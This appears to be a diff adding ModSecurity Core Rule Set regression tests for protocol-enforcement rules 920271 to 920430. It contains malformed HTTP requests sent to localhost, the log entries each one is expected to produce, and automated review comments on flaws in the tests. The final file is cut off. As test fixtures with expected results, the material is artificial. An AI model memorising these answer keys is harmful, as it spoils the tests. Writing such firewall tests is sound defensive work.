User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""
-
test_title: 920271-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%FFindex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""
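Review bot: The URI in 920271-1, `/?test=test1%127`, decodes as the escape `%12` followed by a literal `7`, so the case exercises control byte 0x12 and not byte 127. If the intent was the DEL boundary, the escape is `%7F`; as written no case in this file pins that boundary, and 920271-2 (`%03`) already covers a low control byte. The rule's byte range is not shown on this page, so the expected result for `%7F` should be checked against it before the test is changed.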


@@ -0,0 +1,79 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920272.yaml"
description: "Description"
tests:
-
test_title: 920272-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%25"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
-
test_title: 920272-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%80"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
-
test_title: 920272-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=t%FFest1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
-
test_title: 920272-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%35"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920272\""
-
# This will not trigger with Apache because Apache will block with AH00127
#(22)Invalid argument: [client 127.0.0.1:47427] AH00127: Cannot map GET /i%FFndex.html?test=test1 HTTP/1.1 to file. It will return a 404 instead so we accept either.
test_title: 920272-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/i%FFndex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 404]


@@ -0,0 +1,79 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920273.yaml"
description: "Description"
tests:
-
test_title: 920273-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""
-
# the '&' is one of the only symbol allowed
test_title: 920273-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1&test=t"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
-
test_title: 920273-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
data: "<hello"
output:
log_contains: "id \"920273\""
-
test_title: 920273-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%5FHI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
-
test_title: 920273-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%60HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""


@@ -0,0 +1,85 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920274.yaml"
description: "Description"
tests:
-
# Apache will just error on this and return 400
# as a result we look for forbidden or 400
# In the future FTW should support OR versus AND output
# https://github.com/CRS-support/ftw/issues/19
test_title: 920274-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%1F"
output:
status: [200, 403, 400]
# log_contains: "id \"920274\""
-
test_title: 920274-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "<ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920274\""
-
test_title: 920274-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisISATEST%5F"
output:
no_log_contains: "id \"920274\""
-
test_title: 920274-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisIsATest%60"
output:
log_contains: "id \"920274\""
-
test_title: 920274-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: "ThisIsATest%60"
output:
no_log_contains: "id \"920274\""


@@ -0,0 +1,47 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920280.yaml"
description: "Description"
tests:
-
test_title: 920280-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
log_contains: "id \"920280\""
-
test_title: 920280-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920280\""
-
test_title: 920280-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
# Technically valid but Apache doesn't allow 0.9 anymore
status: 400


@@ -0,0 +1,51 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920290.yaml"
description: "Description"
tests:
-
# Apache will block this with a 400 and it will
# never get to CRS. We will fix this more when
# FTW supports the OR operator for outputs.
test_title: 920290-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: ""
output:
status: [403, 400]
#log_contains: "id \"920290\""
#-
#test_title: 920290-2
#stages:
# -
# stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "%00"
# output:
# no_log_contains: "id \"920290\""
# -
# test_title: 920290-3
# stages:
# -
# stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# output:
# no_log_contains: "id \"920290\""
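Review bot: Tests 920290-2 and 920290-3 are commented out with no reason given, which leaves 920290-1 (a status-only check) as the file's only active case. 920290-3 is a plain negative case (`Host: "localhost"` with `no_log_contains`) that does not depend on the Apache behaviour described at the top of the file, so it looks safe to re-enable. If the two cases must stay disabled, a one-line comment such as `# disabled: <reason>` above them would tell the next maintainer whether they are obsolete or waiting on the FTW change mentioned above.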


@@ -0,0 +1,30 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920300.yaml
tests:
-
test_title: 920300-1
desc: Request Missing an Accept Header (920300) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: ''
output:
log_contains: id "920300"


@@ -0,0 +1,93 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920310.yaml"
description: "Description"
tests:
-
test_title: 920310-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
-
test_title: 920310-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
-
test_title: 920310-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
-
test_title: 920310-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: lol
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
-
test_title: 920310-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
-
test_title: 920310-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""


@@ -0,0 +1,48 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920311.yaml"
description: "Description"
tests:
-
test_title: 920311-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920311\""
-
test_title: 920311-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920311\""
-
test_title: 920311-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: "text/plain, text/html"
output:
no_log_contains: "id \"920311\""


@@ -0,0 +1,32 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
-
test_title: 920320-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
output:
log_contains: "id \"920320\""
-
test_title: 920320-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920320\""


@@ -0,0 +1,33 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
-
test_title: 920330-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: ""
Host: "localhost"
output:
log_contains: "id \"920330\""
-
test_title: 920330-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920330\""
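Review bot: The `meta` block of this file says `name: "920320.yaml"`, but every test in it is titled 920330-x and asserts on `id "920330"`, so the name looks copied from the previous file. Any report or filter keyed on `meta.name` would attribute these results to rule 920320. The line should read `name: "920330.yaml"`.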


@@ -0,0 +1,38 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920340.yaml"
description: "Description"
tests:
-
test_title: 920340-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "2"
data: "xy"
stop_magic: true
output:
log_contains: "id \"920340\""
-
test_title: 920340-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "50"
stop_magic: true
output:
expect_error: true


@@ -0,0 +1,55 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920350.yaml"
description: "Description"
tests:
-
test_title: 920350-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "127.0.0.1"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""
-
test_title: 920350-2
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920350\""
-
test_title: 920350-3
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "1.2.3.4"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""


@@ -0,0 +1,31 @@
---
meta:
author: csanders-git
description: None
# ARG_NAME_LENGTH needs to be set in crs-config
enabled: false
name: 920360.yaml
tests:
-
test_title: 920360-1
desc: Argument name too long (920360) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo
version: HTTP/1.0
output:
log_contains: id "920360"


@@ -0,0 +1,31 @@
---
meta:
author: csanders-git
description: None
# PCRE limits need to be set higher to process this
enabled: false
name: 920370.yaml
tests:
-
test_title: 920370-1
desc: Argument value too long (920370) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
version: HTTP/1.0
output:
log_contains: id "920370"


@@ -0,0 +1,31 @@
---
meta:
author: csanders-git
description: None
# MAX_NUM_ARGS needs to be set in crs-setup
enabled: false
name: 920380.yaml
tests:
-
test_title: 920380-1
desc: Too many arguments in request (920380) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?param1=1&param2=1&param3=1&param4=1&param5=1&param6=1&param7=1&param8=1&param9=1&param10=1&param11=1&param12=1&param13=1&param14=1&param15=1&param16=1&param17=1&param18=1&param19=1&param20=1&param21=1&param22=1&param23=1&param24=1&param25=1&param26=1&param27=1&param28=1&param29=1&param30=1&param31=1&param32=1&param33=1&param34=1&param35=1&param36=1&param37=1&param38=1&param39=1&param40=1&param41=1&param42=1&param43=1&param44=1&param45=1&param46=1&param47=1&param48=1&param49=1&param50=1&param51=1&param52=1&param53=1&param54=1&param55=1&param56=1&param57=1&param58=1&param59=1&param60=1&param61=1&param62=1&param63=1&param64=1&param65=1&param66=1&param67=1&param68=1&param69=1&param70=1&param71=1&param72=1&param73=1&param74=1&param75=1&param76=1&param77=1&param78=1&param79=1&param80=1&param81=1&param82=1&param83=1&param84=1&param85=1&param86=1&param87=1&param88=1&param89=1&param90=1&param91=1&param92=1&param93=1&param94=1&param95=1&param96=1&param97=1&param98=1&param99=1&param100=1&param101=1&param102=1&param103=1&param104=1&param105=1&param106=1&param107=1&param108=1&param109=1&param110=1&param111=1&param112=1&param113=1&param114=1&param115=1&param116=1&param117=1&param118=1&param119=1&param120=1&param121=1&param122=1&param123=1&param124=1&param125=1&param126=1&param127=1&param128=1&param129=1&param130=1&param131=1&param132=1&param133=1&param134=1&param135=1&param136=1&param137=1&param138=1&param139=1&param140=1&param141=1&param142=1&param143=1&param144=1&param145=1&param146=1&param147=1&param148=1&param149=1&param150=1&param151=1&param152=1&param153=1&param154=1&param155=1&param156=1&param157=1&param158=1&param159=1&param160=1&param161=1&param162=1&param163=1&param164=1&param165=1&param166=1&param167=1&param168=1&param169=1&param170=1&param171=1&param172=1&param173=1&param174=1&param175=1&param176=1&param177=1&param178=1&param179=1&param180=1&param181=1&param182=1&param183=1&param184=1&param185=1&param186=1&param187=1&param188=1&param189=1&param190=1&param191=1&
param192=1&param193=1&param194=1&param195=1&param196=1&param197=1&param198=1&param199=1&param200=1&param201=1&param202=1&param203=1&param204=1&param205=1&param206=1&param207=1&param208=1&param209=1&param210=1&param211=1&param212=1&param213=1&param214=1&param215=1&param216=1&param217=1&param218=1&param219=1&param220=1&param221=1&param222=1&param223=1&param224=1&param225=1&param226=1&param227=1&param228=1&param229=1&param230=1&param231=1&param232=1&param233=1&param234=1&param235=1&param236=1&param237=1&param238=1&param239=1&param240=1&param241=1&param242=1&param243=1&param244=1&param245=1&param246=1&param247=1&param248=1&param249=1&param250=1&param251=1&param252=1&param253=1&param254=1&param255=1&param256=1
version: HTTP/1.0
output:
log_contains: id "920380"

File diff suppressed because one or more lines are too long


@@ -0,0 +1,52 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920400.yaml
tests:
-
test_title: 920400-1
desc: Uploaded file size too large (920400) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Length: '10485760'
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="file"; filename="test"'
- 'Content-Type: application/octet-stream'
- ''
- Rotem & Ayala
- ''
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="name"'
- ''
- tt2
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="B1"'
- ''
- Submit
- '-----------------------------265001916915724--'
output:
# Most web servers simply won't respond to invalid requests like
# like this they'll just time out when we get OR type checks
# we'll be able to check for both an error or the rule firing
expect_error: true
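Review bot: The `output` block of 920400-1 checks only `expect_error: true`, so the test passes on any connection error or timeout and gives no evidence that rule 920400 matched. The request declares `Content-Length: '10485760'` over a much shorter body, so an error is the likely outcome whether or not the rule is loaded (inferred from the comment in `output`). Until the harness supports the combined check that comment mentions, make the limitation explicit, e.g. `# NOTE: only proves the request errors out; does not verify that 920400 fired`.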


@@ -0,0 +1,284 @@
---
meta:
author: "csanders-git, Franziska Bühler"
enabled: true
name: "920420.yaml"
description: "Description"
tests:
-
test_title: 920420-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "PROPFIND"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-5
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- --0000
- 'Content-Disposition: form-data; name="name"'
- ''
- John Smith
- --0000
- 'Content-Disposition: form-data; name="email"'
- ''
- john.smith@example.com
- --0000
- 'Content-Disposition: form-data; name="image"; filename="image.jpg"'
- 'Content-Type: image/jpeg'
- ''
- BINARYDATA
- --0000--
output:
log_contains: id "920420"
-
test_title: 920420-6
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/foo; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- --0000
- 'Content-Disposition: form-data; name="name"'
- ''
- John Smith
- --0000
- 'Content-Disposition: form-data; name="email"'
- ''
- john.smith@example.com
- --0000
- 'Content-Disposition: form-data; name="image"; filename="image.jpg"'
- 'Content-Type: image/jpeg'
- ''
- BINARYDATA
- --0000--
output:
log_contains: id "920420"
-
test_title: 920420-7
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: application/foo; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- --0000
- 'Content-Disposition: form-data; name="name"'
- ''
- John Smith
- --0000
- 'Content-Disposition: form-data; name="email"'
- ''
- john.smith@example.com
- --0000
- 'Content-Disposition: form-data; name="image"; filename="image.jpg"'
- 'Content-Type: image/jpeg'
- ''
- BINARYDATA
- --0000--
output:
log_contains: id "920420"
-
test_title: 920420-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/json"
data: "test"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-10
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/soap+xml"
data: "test"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-11
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application"
data: "test"
output:
log_contains: "id \"920420\""
-
test_title: 920420-12
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "multipart/related"
data: "test"
output:
no_log_contains: "id \"920420\""
-
test_title: 920420-13
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "Multipart/Related"
data: "test"
output:
no_log_contains: "id \"920420\""
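Review bot: `description: "Description"` is a placeholder, and tests 920420-1 to -4 and -8 to -13 have no `desc`, so the policy decision behind each expectation is not recorded. This matters most for 920420-11 (`Content-Type: "application"`, expects a log entry) and 920420-13 (`"Multipart/Related"`, expects none). Judging from the expected outputs, suitable lines would be `desc: "Content-Type without a subtype is not allowed"` and `desc: "Content-Type comparison is case-insensitive"`; confirm the wording against the rule.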


@@ -0,0 +1,184 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920430.yaml"
description: "Description"
tests:
-
test_title: 920430-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
-
test_title: 920430-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
-
test_title: 920430-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
-
test_title: 920430-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/2"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
-
# Currently FTW won't process HTTP 1.0 simple response items
# This request generates such a response, so even though it will
# generate the alert, it will error.
test_title: 920430-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: ""
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN"
Host: "localhost"
output:
expect_error: true
-
test_title: 920430-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "1.1"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
-
test_title: 920430-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "TEST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
-
test_title: 920430-8
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/3.0
output:
log_contains: id "920430"
-
test_title: 920430-9
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/0.8
output:
status: [403, 400]
#log_contains: id "920430"
-
test_title: 920430-10
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: JUNK/1.0
output:
status: [403, 400]
# log_contains: id "920430"
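Review bot: Tests 920430-3, -6, -7, -9 and -10 have `log_contains` commented out and assert `status: [403, 400]` instead. A web server can answer 400 to an unparseable protocol version by itself, so these cases can pass even when rule 920430 is not loaded. Record next to each disabled check why it is disabled and what the status assertion does and does not prove, e.g. `# log check disabled: server may reject the request line before the rule runs, so this only checks the request is refused (TODO confirm)`.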


@@ -0,0 +1,113 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920440.yaml
tests:
- test_title: 920440-1
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
